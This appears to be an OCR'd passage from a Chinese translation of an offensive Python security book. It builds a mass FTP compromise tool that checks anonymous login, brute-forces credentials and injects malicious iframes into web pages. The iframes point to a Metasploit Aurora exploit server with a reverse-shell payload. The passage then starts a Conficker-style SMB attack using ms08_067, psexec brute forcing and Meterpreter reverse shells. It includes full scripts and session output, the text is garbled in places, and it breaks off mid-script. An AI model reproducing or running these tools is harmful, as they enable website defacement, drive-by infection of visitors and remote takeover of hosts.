器 被 重 定向 到 恶意 的 网 站 ， 恶 意 的 主机 将 会 在 受害 者 电脑 中 安装 假冒 的 防 病毒 软 
件 ， 并 窃取 受害 者 的 信用 卡 信息 。K985ytv 的 攻击 取得 了 ere 。 在 下 面 的 章 
节 中 ， 我 们 将 用 Python 来 建立 这 种 攻击 。 


检查 受 感 业 服 务 器 的 FTP 日 志 > 我们 看 看 到 底 发 什么 什么 事 。 一 个 自动 的 脚本 连接 
到 目标 主机 以 确认 它 是 否 包 含 一 个 名 为 index.htm 的 默认 主页 。 接 下 来 攻击 者 上 
传 了 一 个 新 的 index.htm 页 面 ， 可 能 包含 恶意 的 重 定向 脚本 。 受 感染 的 服务 器 渗 
透 利 用 任何 访问 它 页 面 的 脆弱 客户 机 。 


204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "LIS 
folderthis/folderthat/" 226 1862 

204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "TYPE 
200 - 

204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "PAS\ 
22/7 - 

204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "SIZE 
index.htm" 213 - 

204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "RETF 
index.htm" 226 2573 

204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "TYPE 
200 - 

204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "PAS\ 
22/7 - 

204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "STO 

index.htm" 226 3018 





为 了 更 好 的 理解 这 种 攻击 的 初始 向 量 。 ge ares gag Es 。 文 件 传输 
协议 FTP 服 务 用 户 在 一 个 基于 TCP 网 络 的 主机 之 间 传 输 文件 。 通 常情 况 下 ， 
过 用 户 名 和 密码 来 验证 FTP 服 务 。 然 而 ， 一 些 网 站 提供 匿名 认证 的 能 力 ， 在 这 

况 下 ， 用 户 提供 用 户 名 为 "anonymous" ， 用 电子 邮件 来 代替 密码 。 


用 Python 构建 匿名 的 FTP 扫 瞄 器 


就 安全 而 言 ， 网 站 提供 匿名 的 FTP 服 务 器 访问 功能 似乎 很 愚 季 。 然 而 ， 令 人 惊讶 的 
是 许多 网 站 提供 这 类 FTP 的 访 De gy ， 这 使 得 更 多 的 软件 获取 软件 的 合法 更 
新 。 我 们 可 以 利用 Python 的 ftplib 模块 来 构建 一 个 小 脚本 ， 用 来 确认 服务 器 是 否 
RY ES ER ° HAR anonLogin() 接受 一 个 主机 名 反 汇 编 一 个 布尔 值 来 确认 主机 
是 否 允 许 匿 名 登录 。 为 了 确认 这 个 布尔 值 ， 这 个 函数 尝试 用 匿名 认证 生成 一 个 FTP 
连接 ， 如 果 成 功 ， 则 返回 True ， 产 生 异 常 则 返回 False 。 


# coding=UTF-8 
import ftplib 


def anonLogin(hostname): 

try: 
ftp = ftplib.FTP(hostname) 
ftp.login('anonymous', 'me@your.com' ) 
print('\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succ 
ftp.quit() 
return True 

except Exception as e: 
print('\n[-] ' + str(hostname) + ' FTP Anonymous Logon Fai: 
return False 


host = '192.168.95.179' 
anonLogin(host) 





attacker# python anonLogin.py 
[*] 192.168.95.179 FTP Anonymous Logon Succeeded. 


利用 Ftplib 骏 力 破解 FTP 用 户 认证 


当 匿 名 登录 一 路 回 车 进入 系统 ， 攻 击 者 也 十 分 成 功 的 利用 偷 来 的 证 书 获得 合法 FTP 

务 器 的 访问 权限 。 FTP 客 户 端 程序 ， 比 如 说 Filezilla， 经 党 将 密码 存储 在 配置 文件 
中 。 安 全 专家 发 现 ， 由 于 最 近 的 恶意 软件 ，FTP 证 书 经 常 被 偷 取 。 此 外 ，HD 
Moore 甚 至 将 get_filezilla_creds.rb 的 脚本 包含 到 最 近 的 Metasploit 的 发 行 版 
本 中 允许 用 户 快速 的 扫描 目标 主机 的 FTP 证 书 。 想 象 一 个 我 们 想 通 过 暴力 破解 的 包 
Ay username/password 组 合 的 文本 文件 。 对 于 这 个 脚本 的 目的 ， 利 用 存 贮 在 文本 
文件 中 的 username/password 组 合 。 


administrator:password 
admin:12345 
root:secret 
guest:guest 

root:toor 


现在 我 们 能 扩展 前 面 建立 的 anonLogin() 有 函数 建立 名 为 brutelogin() 的 函数 。 
这 个 函数 接受 主机 名 和 窖 码 文件 作为 输入 返回 允许 访问 主机 的 证 书 。 注 意 ， 函 数 选 
代 文 件 的 每 一 行 ， 用 冒号 分 割 用 户 名 和 密码 ， 然 后 这 个 函数 用 用 户 名 和 密码 尝试 登 


陆 FTP 服 务 器 。 如 果 成 功 ， 将 返回 用 户 名 和 密码 的 元 组 ， 如 果 失 败 有 异常 ， 将 继续 
测试 下 一 行 。 如 果 遍 历 完 所 有 的 用 户 名 和 密码 都 没有 成 功 ， 则 返回 包含 None 的 元 
组 。 


# coding=UTF-8 
import ftplib 


def bruteLogin(hostname, passwdFile): 
pF = open(passwdFile, 'r') 
for line in pF.readlines(): 
userName = line.split(':')[0] 
passWord = line.split(':')[1]-strip('\r').strip('\n') 
print("[+] Trying: " + userName + "/" + passWord) 
try: 
ftp = ftplib.FTP(hostname) 
ftp.login(userName, passWord) 
print('\n[*] ' + str(hostname) + ' FTP Logon Succeeded 
ftp.quit() 
return (userName, passWord) 
except Exception as e: 
pass 
print('\n[-] Could not brute force FTP credentials.') 
return (None, None) 


host = '192.168.95.179' 
passwdFile = 'userpass.txt' 
bruteLogin(host, passwdFile) 


a -y 





遍历 用 户 名 和 密码 组 合 ， 我 们 终于 找到 了 用 户 名 以 及 对 应 的 密码 。 


attacker# python bruteLogin.py 

[+] Trying: administrator/password 

[+] Trying: admin/12345 

[+] Trying: root/secret 

[+] Trying: guest/guest 

[*] 192.168.95.179 FTP Logon Succeeded: guest/guest 


FTP FA SE -FIRWEB 面 


有 了 FTP 访 问 权 限 ， 我 们 还 要 测试 服务 器 是 否 还 提供 了 WEB 访 问 。 为 了 测试 这 个 ， 
我 们 首先 要 列 出 FTP 的 服务 目录 并 寻找 默认 的 WEB 页 面 。 遂 

a returnDefault() 接受 一 个 FTP 连 接 作 为 输入 并 返回 一 个 找到 的 默认 页 面 的 数 
组 。 它 通过 发 送 命令 NLST 列 出 目录 内 容 。 这 个 函数 检查 每 个 文件 返回 默认 WEB 页 
面 文件 名 并 将 任何 发 现 的 默认 WEB 页 面 文件 名 添加 到 名 为 retList 的 列表 中 。 完 
成 和 迭代 这 些 文件 之 后 ， 函 数 将 返回 这 个 列表 。 


# coding=UTF-8 
import ftplib 


def returnDefault(ftp): 
try: 
dirList = ftp.nlst() 
except: 
dirList = 
print('[-] Could not list directory contents.') 
print('[-] Skipping To Next Target.') 
return 
retList = [] 
for fileName in dirList: 
fn = fileName. lower () 
if '.php' in fn or '.htm' in fn or '.asp' in fn: 
print('[+] Found default page: ' + fileName) 
retList.append(fileName) 
return retList 


host = '192.168.95.179' 
userName = 'guest' 

passWord = 'guest' 

ftp = ftplib.FTP(host) 
ftp.login(userName, passWord) 
returnDefault (ftp) 


看 着 这 个 脆弱 的 FTP 服 务 器 ， 我 们 可 以 看 到 它 有 三 个 WEB 页 面 在 基 目 录 下 。 好 极 
了 ， 我 们 知道 可 以 移动 我 们 的 攻击 向 量 到 我 们 的 被 感染 的 页 面 。 


attacker# python defaultPages.py 

[+] Found default page: index.html 
[+] Found default page: index.php 

[+] Found default page: testmysql.php 


添加 恶意 注入 脚本 到 WEB 页 面 


现在 我 们 已 经 找到 了 WEB 页 面 文件 ， 我 们 必须 用 一 个 恶意 的 重 定 向 感染 它 。 为 了 快 
速 的 生成 一 个 和 恶意 的 服务 器 和 页 面 在 http://10.10.10.112:8080/exploit 页 面 ， 我 们 
将 使 用 Metasploit 框 架 。 注 意 ， 我 们 选择 ms10_002_aurora 的 Exploit, 同 样 的 
Exploit 被 用 在 攻击 Google 的 极光 行动 中 。 位 与 http://10.10.10.112:8080/exploit 的 
页 面 将 重 定向 到 受害 者 ， 这 将 返回 给 我 们 一 个 反弹 的 Shell。 


attacker# msfcli exploit/windows/browser/ms10_002_aurora 
LHOST=10.10.10.112 SRVHOST=10.10.10.112 URIPATH=/exploit 
PAYLOAD=windows/shell/reverse_tcp LHOST=10.10.10.112 LPORT=443 

[*] Please wait while we load the module tree... 

<,...SNIPPED...> 

LHOST => 10.10.10.112 

SRVHOST => 10.10.10.112 

URIPATH => /exploit 

PAYLOAD => windows/shell/reverse_tcp 

LHOST => 10.10.10.112 

LPORT => 443 

[*] Exploit running as background job. 

[*] Started reverse handler on 10.10.10.112:443 

[*] Using URL:http://10.10.10.112:8080/exploit 

] Server started. 

sf exploit(msi0_002_aurora) > 


SS a i rt) 





任何 脆弱 的 客户 机 连接 到 我 们 的 服务 页 面 http://10.10.10.112:8080/exploit 都 将 会 

落 入 我 们 的 陷阱 中 。 。 如 果 成 功 ， 它 将 建立 一 个 反 向 的 TCP Shell 并 允许 我 们 远程 的 
在 客户 机 上 执行 Windows 命 令 。 从 这 个 命令 行 Shell 我 们 能 在 受 感染 的 受害 者 主机 上 
以 管理 员 权 限 执行 命令 。 


msf exploit(ms10_002_aurora) > 

[*] Sending Internet Explorer "Aurora" Memory Corruption to client 
[*] Sending stage (240 bytes) to 10.10.10.107 

[*] Command shell session 1 opened (10.10.10.112:443 ->10.10.10.10' 
msf exploit(ms10_002_aurora) > sessions -i 1 

[*] Starting interaction with 1... 

Microsoft Windows XP [Version 5.1.2600] 

(C) Copyright 1985-2001 Microsoft Corp. 

C:\Documents and Settings\Administrator\Desktop> 


4 — y} 


接 下 来 ， 我 们 必须 添加 一 个 重 定向 从 被 感染 的 主机 到 我 们 的 恶意 的 服务 器 。 为 此 ， 
我 们 可 以 从 攻陷 的 服务 器 下 载 默 认 的 WEB 页 面 ， 注 入 一 个 iframe > REL 
意 的 页 面 到 服务 器 上 。 看 看 这 个 injectPage() 函数， 它 接受 一 个 FTP 连 接 ， 一 个 

页 面 名 和 一 个 重 定向 的 iframe 的 字符 串 作 为 输入 ， 然 后 下 载 页 面 作为 临时 副本 ， 
接 下 来 ， 添加 重 定 向 的 iframe 代码 到 临时 文件 中 。 最 后 ， 该 函数 上 传 这 个 被 感染 
的 页 面 到 服务 器 中 。 





# coding=UTF-8 
import ftplib 
def injectPage(ftp, page, redirect): 


f = open(page + '.tmp', 'w') 
ftp.retrlines('RETR ' + page, f.write) 


print '[+] Downloaded Page: ' + page 

f .write(redirect ) 

f.close() 

print '[+] Injected Malicious IFrame on: ' + page 


ftp.storlines('STOR ' + page, open(page + '.tmp')) 
print '[+] Uploaded Injected Page: ' + page 


host = '192.168.95.179' 

userName = 'guest' 

password = 'guest' 

ftp = ftplib.FTP(host ) 

ftp.login(userName, passWord) 

redirect = '<iframe src="http://10.10.10.112:8080/exploit"></iframe 
injectPage(ftp, ‘index.html', redirect) 


一 一 一 


运行 我 们 的 代码 ， 我 们 可 以 看 到 它 下 载 index.html 页 面 然 后 注入 我 们 的 恶意 代 
码 到 里 面 。 





attacker# python injectPage.py 

[+] Downloaded Page: index.html 

[+] Injected Malicious IFrame on: index.html 
[+] Uploaded Injected Page: index.html 


将 攻击 整合 在 一 起 


现在 我 们 就 整合 所 有 的 攻击 到 attack() 函数 中 。 attack() 函数 接收 一 个 主机 
名 ， 用 户 名 ， 密 码 和 定位 地 址 为 输入 。 这 个 函数 首先 利用 用 户 和 凭证 登陆 FTP 服 务 

器 ， 接 下 来 我 们 了 寻找 默认 页 面 ， 下 载 每 一 个 页 面 并 且 添 加 恶意 的 重 定向 代码 ， 然 后 
上 传 修改 后 的 页 面 到 FTP 服 务 器 中 。 


def attack(username, password, tgtHost, redirect): 
ftp = ftplib.FTP(tgtHost ) 
ftp.login(username, password) 
defPages = returnDefault(ftp) 
for defPage in defPages: 
injectPage(ftp, defPage, redirect) 


添加 一 些 选项 参数 ， 我 们 包装 整合 我 们 的 脚本 。 你 将 注意 到 我 们 首先 尝试 匿名 登录 
FTP 服 务 器 ， 如 果 失 败 ， 我 们 将 通过 暴力 破解 得 到 服务 器 的 认证 。 虽 然 只 有 近 百 行 


代码 ， 


但 这 个 攻击 完全 可 以 复制 k985ytv 的 原始 的 攻击 向 量 。 


# coding=UTF-8 


import ftplib 
import optparse 
import time 


def anonLogin(hostname): 


def 


def 


try: 
ftp = ftplib.FTP(hostname) 
ftp.login('anonymous', 'me@your.com' ) 
print('\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succ 
ftp.quit() 
return True 
except Exception as e: 
print('\n[-] ' + str(hostname) + ' FTP Anonymous Logon Fai: 
return False 


bruteLogin(hostname, passwdFile): 
pF = open(passwdFile, 'r') 
for line in pF.readlines(): 
time.sleep(1) 
userName = line.split(':')[0] 
passWord = line.split(':')[1].strip('\r').strip('\n') 
print '[+] Trying: ' + userName + '/' + passWord 
try: 
ftp = ftplib.FTP(hostname) 
ftp.login(userName, passWord) 
print('\n[*] ' + str(hostname) + ' FTP Logon Succeeded 
ftp.quit() 
return (userName, passWord) 
except Exception, e: 
pass 
print('\n[-] Could not brute force FTP credentials.') 
return (None, None) 


returnDefault(ftp): 
try: 
dirList = ftp.nlst() 
except: 
dirList = [] 
print('[-] Could not list directory contents.') 
print('[-] Skipping To Next Target.') 
return 
retList = [] 
for fileName in dirList: 
fn = fileName. lower() 
if '.php' in fn or '.htm' in fn or '.asp' in fn: 
print('[+] Found default page: ' + fileName) 


retList.append(fileName) 
return retList 


def injectPage(ftp, page, redirect): 
f = open(page + '.tmp', 'w') 
ftp.retrlines('RETR ' + page, f.write) 
print('[+] Downloaded Page: ' + page) 
f .write(redirect ) 
f.close() 
print('[+] Injected Malicious IFrame on: ' + page) 
ftp.storlines('STOR ' + page, open(page + '.tmp')) 
print('[+] Uploaded Injected Page: ' + page) 


def attack(username, password, tgtHost, redirect): 
ftp = ftplib.FTP(tgtHost ) 
ftp.login(username, password) 
defPages = returnDefault(ftp) 
for defPage in defPages: 
injectPage(ftp, defPage, redirect) 


def main(): 
parser = optparse.OptionParser('usage%prog -H <target host[s]> 
parser.add_option('-H', dest='tgtHosts', type='string', help=': 
parser.add_option('-f', dest='passwdFile', type='string', help: 
parser.add_option('-r', dest='redirect', type='string', help='s 
(options, args) = parser.parse_args() 
tgtHosts = str(options.tgtHosts).split(', ') 
passwdFile = options.passwdFile 
redirect = options.redirect 


if tgtHosts == None or redirect == None: 
print parser.usage 
exit(0) 


for tgtHost in tgtHosts: 

username = None 

password = None 

if anonLogin(tgtHost) == True: 
username = 'anonymous' 
password = 'me@your.com' 
print '[+] Using Anonymous Creds to attack' 
attack(username, password, tgtHost, redirect) 


elif passwdFile != None: 

(username, password) = bruteLogin(tgtHost, passwdFile) 
if password != None: 

print'[+] Using Creds: ' + username + '/' + password + 


attack(username, password, tgtHost, redirect) 


if name == main ee: 


main() 








运行 我 们 的 脚本 攻击 一 个 脆弱 的 FTP 服 务 器 ， 我 们 看 到 它 尝试 匿 名 登陆 失败 ， 然 后 
暴力 破解 获得 用 户 名 和 密码 ， 然 后 下 载 和 注入 代码 到 每 一 个 基 目 录 里 的 文件 。 


attacker# python massCompromise.py -H 192.168.95.179 -r '<iframe si 
[-] 192.168.95.179 FTP Anonymous Logon Failed. 

[+] Trying: administrator/password 

[+] Trying: admin/12345 

[+] Trying: root/secret 

[+] Trying: guest/guest 

[*] 192.168.95.179 FTP Logon Succeeded: guest/guest 
[+] Found default page: index.html 

[+] Found default page: index.php 

[+] Downloaded Page: index.html 

[+] Injected Malicious IFrame on: index.html 

[+] Uploaded Injected Page: index.html 

[+] Downloaded Page: index.php 

[+] Injected Malicious IFrame on: index.php 

[+] Uploaded Injected Page: index.php 

[+] Injected Malicious IFrame on: testmysql.php 


SS SS 


我 们 确保 我 们 的 攻击 向 量 在 运行 ， 然 后 等 待 客户 机 连接 到 我 们 受 感染 的 WEB 服 务 器 
ko #RH> 10.10.10.107 访问 了 服务 器 然后 重 定向 到 了 我 们 的 恶意 服务 器 上 。 
成 功 ! 我 们 通过 被 感染 的 FTP 服 务 器 得 到 了 一 个 受害 者 主机 的 命令 行 Shell。 





attacker# msfcli exploit/windows/browser/ms10_002_aurora LHOST=10.: 
[*] Please wait while we load the module tree... 

...ONIPPED...> 

Exploit running as background job. 

Started reverse handler on 10.10.10.112:443 

Using URL:http://10.10.10.112:8080/exploit 

Server started. 

exploit(ms10_002_aurora) > 

Sending Internet Explorer "Aurora" Memory Corruption to client 
Sending stage (240 bytes) to 10.10.10.107 

Command shell session 1 opened (10.10.10.112:443 -> 10.10.10.1( 
exploit(ms10_002_aurora) > sessions -i 1 

[*] Starting interaction with 1... 

Microsoft Windows XP [Version 5.1.2600] 

(C) Copyright 1985-2001 Microsoft Corp. 

C:\Documents and Settings\Administrator\Desktop> 


[| 


虽然 很 多 罪犯 传播 假 的 反 病 毒 软件 利用 了 k985ytv 攻 击 作为 许多 的 攻击 向 量 之 一 。 
km985ytv 成 功 的 攻陷 了 11000 台 主机 中 的 2220 台 。 总 的 来 说 ， 假 冒 的 杀毒 软件 盗 取 
了 超过 43000000 的 用 户 的 信用 卡 信息 在 2009 年 ， 并 还 在 持续 增长 中 。 这 一 百 多 行 
的 代码 还 不 错 。 在 下 一 节 中 ， 我 们 将 创建 一 个 攻击 了 200 多 个 国家 5 百 万 台 主 机 的 攻 
击 向 量 。 
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Conficker 2 > At ABA BASEN 


2008 年 下 旬 ， 计 算 机 安全 专家 被 一 个 有 趣 的 改变 游戏 规则 的 蠕虫 叫 醒 。Conficker 
和 W32DownandUp 蠕 虫 如 此 迅速 的 划 延 ， 很 快 就 感染 了 200 多 个 国家 的 5 百 多 万 台 
主机 。 在 一 些 先进 (数字 签名 ， 有 效 的 加 蜜 荷载 ， 另 类 的 传播 方案 ) 的 辅助 攻击 中 ， 
Conficker 蠕 虫 非常 用 心 ， 和 1988 年 的 Morris 蠕 虫 有 着 相似 的 攻击 向 量 。 在 接 下 来 的 
章节 中 ， 我 们 将 重 现 Conficker 蠕 虫 的 主要 攻击 向 量 。 


在 常规 的 感染 的 基础 上 ，Conficker 利 用 了 两 个 单独 的 攻击 向 量 。 首 先 ， 利 用 
Windows Soret eam ace El 。 利 用 这 个 漏洞 ， 蠕 虫 能 够 引起 堆栈 溢出 从 
而 能 够 执行 Shellcode 并 下 载 一 个 副本 给 受到 感染 的 主机 。 当 这 种 攻击 方法 失败 时 ， 
Conficker 蠕 虫 党 试 通过 暴力 破解 默认 的 网 络 管理 共享 ( ADMIN$ ) 来 获取 受害 人 主机 
的 管理 权限 。 


党 码 攻 击 


在 它 的 攻击 中 ，Conficker 闯 虫 利 用 了 一 个 超过 250 个 常用 密码 的 密码 列表 。Morris 
蠕虫 曾 使 用 的 密码 列表 有 432 个 密码 。 这 两 个 非常 成 功 的 攻击 有 11 个 共同 的 密码 。 
建立 你 自己 的 攻击 列表 时 ， 是 绝对 值得 包含 这 11 个 密码 的 。 


aaa 
academia 
anything 
coffee 
computer 
cookie 
oracle 
password 
secret 
super 
Unknown 


在 几 次 大 规模 的 攻击 波 中 ， 黑 客 们 发 布 了 很 多 密码 在 网 络 上 。 而 导致 这 些 密码 尝试 
的 活动 无 疑 是 违法 的 。 这 些 密 码 已 经 被 安全 专家 研究 证 明 是 很 有 趣 的 。DARPA 计 算 
机 网 络 快速 追踪 项 目 管理 人 ，Peiter Zatko 让 整个 房间 的 军队 高 层 脸 红 ， 当 他 问 到 
他 们 是 否 用 两 个 大 写字 母 ， 再 加 上 两 个 特殊 符号 和 两 个 数字 组 合 来 构建 他 们 的 密码 
时 。 此 外 ， 黑 客 组 织 LulzSec 在 2011 年 6 月 公布 了 26000 个 使 用 的 密码 和 个 人 信息 。 
在 一 次 有 组 织 的 攻击 中 ， 这 些 密码 被 用 来 重复 攻击 同一 个 人 的 社交 网 站 。 然 而 ， 规 
模 最 大 的 攻击 是 一 个 新 闻 和 八卦 的 博客 网 站 泄漏 了 一 百 万 的 用 户 名 和 密码 。 


用 REA a SMBR 


了 简化 我 们 的 攻击 ， 我 们 将 使 用 Metasploit 框 架 ， 可 以 从 下 面 的 网 站 下 载 : 
/Imetasploit.com/download/ ° Metasploit 是 开源 的 计算 机 安全 项 目 ， 在 过 去 的 
几 年 里 正在 得 到 快速 的 发 展 和 普及 并 已 经 成 为 很 受 欢迎 的 渗透 工具 包 。 由 传奇 人 物 
HD Moore 倡 导 并 开发 的 。Metasploit 允 许 渗透 测试 人 员 利 用 标准 化 的 脚本 环境 发 起 
数 千 种 不 同 的 渗 黎 测试。 发 行 版 包含 了 Conficker 蠕 时 利用 的 漏洞 ，HD Moore 整 合 
了 这 个 渗透 测 ue Metasploit? --- ms@8-067_netapi ° 


利用 Metasploit 我 们 可 以 在 攻击 时 进行 交互 ， 它 也 有 能 力 读 取 批 处 理 资 源 文 件 。 
Metasploit 按 顺序 处 理 ， 以 便 执 行 批 处 理 文件 中 的 命令 进行 攻击 。 例 如 ， 如 果 我 们 
想 攻 击 的 目标 主机 为 192.168.13.37 ， 利 用 ms80-067_netapi 渗透 测试 ， 并 返 
回 给 192.168.77.77 主机 上 的 7777 端 口 的 一 个 TCP Shell ° 


use exploit/windows/smb/ms08_067_netapi 

set RHOST 192.168.1.37 

set PAYLOAD windows/meterpreter/reverse_ tcp 
set LHOST 192.168.77.77 

set LPORT 7777 

exploit -j -z 


为 了 利用 Metasploit 的 攻击 ， 我 们 选择 我 们 的 

Exploit( exploit/windows/smb/ms08_067_netapi )， 然 后 设置 目标 

为 192.168.1.37 。 接 下 来 我 们 指定 攻击 荷载 

为 windows/meterpreter/reverse_tcp 选择 反 向 连接 到 我 们 

的 192.168.77.77 的 7777 端 口上 ， 最 后 我 们 告诉 Metasploit 开 始 攻击 系统 。 保 存 
配置 文件 为 conficker .rc ， 我 们 可 以 通过 命 

令 msfconsole -r conficker.rc 来 启动 我 们 的 攻击 。 这 个 命令 会 告诉 
Metasploit 根 据 conficker.rc 来 启动 攻击 。 如 果 成 功 ， 我 们 的 攻击 会 返回 一 个 命 
令 行 Shell 来 控制 对 方 电脑 。 


attacker$ msfconsole -r conficker.rc 

[*] Exploit running as background job. 

[*] Started reverse handler on 192.168.77.77:7777 

[*] Automatically detecting the target... 

[*] Fingerprint: Windows XP - Service Pack 2 - lang:English 

[*] Selected Target: Windows XP SP2 English (AlwaysOn NX) 

[*] Attempting to trigger the vulnerability... 

[*] Sending stage (752128 bytes) to 192.168.1.37 

[*] Meterpreter session 1 opened (192.168.77.77:7777 -&gt; 192.168 
msf exploit(ms08_067_netapi) &gt; sessions -i 1 


[*] Starting interaction with 1... 
meterpreter &gt; execute -i -f cmd.exe 
Process 2024 created. 

Channel 1 created. 

Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 
C:\WINDOWS\system32&gt ; 





# Python Metasploit x 2 


ABT ! RNET- AmE” BIT AEH k T —tshelle RR 
过 程 对 254 个 主机 会 花费 大 量 的 时 间 来 修改 配置 文件 ， 但 是 如 果 利 用 Python， 我 们 
可 以 生成 一 个 快速 的 扫描 脚本 ， 扫 描 445 端 口 打开 的 主机 ， 然 后 利用 Metasploit 资 源 


文件 攻击 有 漏洞 的 主机 。 


首先 ， 让 我 们 从 先前 的 端口 扫描 的 例子 中 利用 python-nmap 模块 。 这 里 ， 函 

数 findTgts() 以 潜在 目标 主机 作为 输入 ， 返 回 所 有 开 了 TCP 445 端 口 的 主机 。 
TCP 445 端 口 是 SMB 协 议 的 主要 端口 。 只 要 主机 的 TCP 445 端 口 是 开放 的 ， 我 们 的 
脚本 就 能 有 效 的 攻击 ， 这 会 消除 主机 对 我 们 尝试 连 接 的 阻碍 。 有 函数 通过 7 
ARQ EAL? toR RRAN EMA T 44554 7 > REIMAA o DRUK 

> AARRE ASH A A R445 7 EHNA R © 


import nmap 


def findTgts(subNet): 
nmScan = nmap.PortScanner() 
nmScan.scan(subNet, '445') 
tgtHosts = [] 
for host in nmScan.all_hosts(): 
if nmScan[host].has_tcp(445): 
state = nmScan[host]['tcp'][445]['state'] 
if state == 'open': 
print '[+] Found Target Host: ' + host 
tgtHosts.append(host) 
return tgtHosts 


接 下 来 ， 我 们 将 对 我 们 攻击 的 目标 设置 监听 ， 监 听 器 或 者 命令 行 与 控制 信道 ， 一旦 
他 们 渗透 成 功 我 们 就 可 以 与 远程 目标 主机 进行 交互 。Metasploit 提 供 了 先进 的 动态 
的 Hak ef BMeterpreter o Metaanin Meterpreter 运 行 在 远程 主机 上 ， 返 回 给 我 们 
命令 行 用 来 控制 主机 ， 提 供 了 大 量 的 控制 和 el 目标 主机 的 能 力 。 "Meterpreter 扩 展 
了 命令 行 的 能 力 ， 包 括 数 字 取 证 ， 发 送 命令 ， 远 程 路 由 ， 安 装 键盘 记录 器 ， 下 载 密 
码 或 者 Hash 密 码 等 等 功能 。 


当 Meterpreter 反 向 连接 到 攻击 者 主机 ， 并 控制 主机 的 Metasploit 的 模块 叫 

做 multi/handler 。 为 了 在 我 们 的 主机 上 设置 multi/handler 的 监听 器 ， 我 们 
首先 要 写 下 指令 到 Metasploit 的 资源 配置 文件 中 。 注 意 ， 我 们 如 何 设 置 一 个 有 效 的 
TCP 反 弹 连 接 的 攻击 荷载 并 标明 我 们 本 地 主机 将 要 接受 连接 的 地 址 和 端口 号 。 此 
外 ， SEE TEAR eS ncaa eee AR ERNA A i E 
机 都 不 必 设 置 监听 器 ， 因 为 我 们 已 经 正在 监听 了 。 


def setupHandler(configFile, lhost, lport): 
configFile.write('use exploit/multi/handler\n' ) 
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\r 
configFile.write('set LPORT ' + str(lport) + '\n') 
configFile.write('set LHOST ' + lhost + '\n') 
configFile.write('exploit -j -z\n') 

configFile.write('setg DisablePayloadHandler 1\n' ) 


a — 








最 后 ， 脚 本 已 经 准备 好 了 攻击 目标 主机 。 这 个 函数 将 接收 一 个 Metasploit 配 置 文 

件 ， 一 个 目标 主机 ， 一 个 本 地 地 址 和 端口 作为 输入 进行 渗透 测试 。 这 个 函数 写 入 特 
定 的 exploit 到 配置 文件 中 。 它 首先 选择 特殊 的 exploit---ms08-067_netapi ， 曾 
经 被 Conficker 蠕 足利 用 的 exploit 攻 击 目标 。 此 外 ， 它 还 要 选择 Meterpreter 攻 击 荷载 
需要 的 本 地 地 址 和 本 地 端口 。 最 后 ， 它 发 送 一 个 指令 开始 攻击 目标 主机 ， 在 后 台 执 


行 工作 ( -j )， 但 并 不 马上 打开 交互 ( -z )， 该 脚本 需要 一 些 特定 的 选项 ， 因 为 它 
将 攻击 多 个 主机 ， 无 法 与 所 以 的 主机 进行 交互 。 


def confickerExploit(configFile, 
configFile. 
configFile. 
configFile. 
configFile. 
configFile. 


write('use 
write('set 
write('set 
write('set 
write('set 


tgtHost, lhost, lport): 
exploit/windows/smb/ms08_067_netapi\n' ) 
RHOST ' + str(tgtHost) + '\n') 

PAYLOAD windows/meterpreter/reverse_tcp\r 
LPORT ' + str(lport) + '\n') 

LHOST ' + lhost + '\n') 


configFile.write('exploit -j -z\n') 





远程 执行 暴力 破解 


当 攻 击 者 成 功 的 启动 ms98-967_netapi 的 exploit 攻 击 全 世界 的 受害 者 的 时 候 ， 管 
理 员 安装 最 新 的 安全 补丁 能 轻松 的 组 织 攻 击 。 因 此 ， 脚 本 将 使 用 Conficker 蠕 虫 使 用 
的 第 二 个 攻击 向 量 。 它 将 通过 用 户 名 和 密码 的 组 合 暴力 破解 SMB 服 务 获得 对 主机 的 
远程 远程 执行 程序 的 权限 。 


函数 smbBrute 接 受 Metasploit 配 置 文件 ， 目标 主机 ， 一 系列 密码 的 文件 ， 本 地 地 址 
和 本 地 端口 作为 输入 ， 然 后 进行 监听 。 它 设置 用 户 名 为 默认 的 Windows 管 理 员 
administrator 然 后 打开 密码 文件 。 对 于 文件 的 每 一 个 密码 ， 函 数 将 建立 一 个 
Metasploit 资 源 配置 文件 为 了 使 用 远程 执行 程序 的 exploit。 如 果 一 个 用 户 名 和 密码 
组 合成 功 了 ，exploit 将 会 启动 Meterpreter 攻 击 荷载 反 向 连接 到 本 地 的 地 址 和 端口 。 


def smbBrute(configFile, tgtHost, 
username = 'Administrator' 
pF = open(passwdFile, 'r') 
for password in pF.readlines(): 
password = password.strip('\n').strip('\r') 


passwdFile, lhost, lport): 


configFile. 
configFile. 
configFile. 
configFile. 
configFile. 
configFile. 
configFile. 
configFile. 


write('use 
write('set 
write('set 
write('set 
write('set 
write('set 
write('set 


write('exploit -j 


exploit/windows/smb/psexec\n' ) 
SMBUser ' + str(username) + '\n') 
SMBPass ' + str(password) + '\n') 
RHOST ' + str(tgtHost) + '\n') 
PAYLOAD windows/meterpreter/reverse_i 
LPORT ' + str(lport) + '\n') 

LHOST ' + lhost + '\n') 

-z\n') 
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尝试 把 所 有 的 功能 放 在 一 起 ， 我 们 的 脚本 现在 已 经 具备 扫描 目标 ， 利 
用 ms08-067_netapi 漏洞 ， 其 力 破解 SMB 用 户 名 密码 并 远程 执行 程序 的 能 力 了 。 
最 后 ， ?我 们 增加 一 些 选 先 项 给 脚本 的 main() 部 数 把 以 前 写 的 函数 整合 包装 在 一 起 调 


用 。 


完整 的 代码 如 下 。 


# coding=UTF-8 


import 
import 
import 
import 


OS 


sys 
nmap 


optparse 


def findTgts(subNet): 


def 


def 


def 


nmScan = 


nmScan.scan(subNet, 


tgtHosts = 


nmap .PortScanner() 


'445') 
[] 


for host in nmScan.all_hosts(): 
if nmScan[host].has_tcp(445): 


state = 


if 


nmScan[host]['tcp'][445]['state'] 
state == 'open': 

print '[+] Found Target Host: 
tgtHosts.append(host) 


